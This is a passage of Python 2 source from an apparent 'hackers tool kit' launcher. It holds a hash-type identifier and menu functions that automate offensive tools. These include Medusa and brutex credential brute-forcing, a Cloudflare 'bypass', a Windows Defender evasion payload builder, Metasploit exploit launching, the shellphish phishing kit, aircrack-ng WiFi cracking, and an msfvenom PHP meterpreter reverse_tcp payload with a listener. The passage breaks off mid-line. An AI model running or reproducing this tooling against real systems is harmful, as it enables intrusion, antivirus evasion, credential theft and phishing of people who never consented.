hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> 